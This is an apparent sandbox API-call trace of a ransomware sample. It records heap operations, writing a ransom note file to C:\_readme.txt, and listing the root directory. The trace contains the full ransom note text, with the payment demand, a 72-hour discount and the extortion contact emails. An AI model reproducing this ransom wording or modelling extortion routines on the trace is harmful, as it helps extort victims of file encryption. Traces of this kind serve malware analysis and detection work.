0x2ac3dd0 [0179.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.597] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.597] PathFindFileNameW (pszPath="") returned="" [0179.597] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0179.598] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0179.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0179.598] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0179.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.614] FreeLibrary (hLibModule=0x759a0000) returned 1 [0179.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x2ade6e0 [0179.627] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0179.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0179.628] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0179.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2adeef0 [0179.629] lstrcpyW (in: lpString1=0x2adeef0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.629] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0179.629] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x580 [0179.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x2ae6bf8 [0179.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x85c) returned 0x2ae74c0 [0179.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae74c0, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 1117 [0179.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2ae7d28 [0179.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae74c0 | out: hHeap=0x2c0000) returned 1 [0179.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6bf8 | out: hHeap=0x2c0000) returned 1 [0179.649] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 1116 [0179.650] WriteFile (in: hFile=0x580, lpBuffer=0x2ae7d28*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x2f9fb64, lpOverlapped=0x0 | out: lpBuffer=0x2ae7d28*, lpNumberOfBytesWritten=0x2f9fb64*=0x45c, lpOverlapped=0x0) returned 1 [0179.651] CloseHandle (hObject=0x580) returned 1 [0179.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae7d28 | out: hHeap=0x2c0000) returned 1 [0179.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adeef0 | out: hHeap=0x2c0000) returned 1 [0179.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.654] FindFirstFileW (in: lpFileName="C:\\*" (normalized: "c:\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7f4e9560, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f4e9560, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2a05da8 [0179.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0179.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0179.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad75e0 [0179.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0179.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0179.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0179.655] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0179.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7658 [0179.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x2a05de8 [0179.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0179.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0179.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7658 | out: hHeap=0x2c0000) returned 1 [0179.656] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0179.656] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x95957a00, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95957a00, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95957a00, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0179.656] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0179.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0179.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0179.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9ed0 [0179.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0179.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7658 [0179.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0179.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05de8 | out: hHeap=0x2c0000) returned 1 [0179.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0179.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0179.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0179.658] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa384ad20, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa384ad20, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xd6895580, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0179.658] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xb883f1e0, ftCreationTime.dwHighDateTime=0x1d8a6e8, ftLastAccessTime.dwLowDateTime=0xb883f1e0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xb883f1e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0179.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0179.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0179.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0179.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0179.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7658 | out: hHeap=0x2c0000) returned 1 [0179.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0179.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0179.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7658 [0179.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.660] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa37fea60, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa37fea60, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xd70c4120, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0179.660] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0179.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0179.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0179.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0179.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76f8 [0179.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0179.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 